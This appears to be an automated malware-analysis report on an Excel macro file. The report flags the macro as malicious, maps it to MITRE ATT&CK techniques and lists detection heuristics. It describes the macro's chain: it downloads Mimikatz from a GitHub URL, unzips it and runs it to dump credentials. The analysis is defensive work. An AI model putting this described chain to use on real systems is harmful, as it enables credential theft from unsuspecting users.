MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
T1059.003 Windows Command Shell
The sample is an XLSM file containing VBA macros. The macro uses URLDownloadToFile to download a Mimikatz executable from a GitHub URL to C:\Windows\Temp\goodware.zip. It then attempts to unzip the file and execute mimikatz.exe with commands to dump credentials, writing the output to C:\Windows\Temp\mimikatz_output.log. This indicates a clear intent to exfiltrate credentials.
Heuristics 5
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBA
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA project inside OOXML medium OOXML_VBADocument contains a VBA project — VBA macros present
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.basee470a5768035b4419e94bd60e7e7524f4b70b237862bd0262a3914021b93851 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3049 bytes |
vbaProject_00.bin99ef716040a3e667aa2409d8fca6a1d84b3a098fc5b9f18756477aa8a605f8ea |
vba-project | OOXML VBA project: xl/vbaProject.bin | 36352 bytes |
emf_00.emfb04b3fa5751cca12ab6f453fb005676552aa48db7807d04d89fc3ee9f098b5d6 |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2712 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.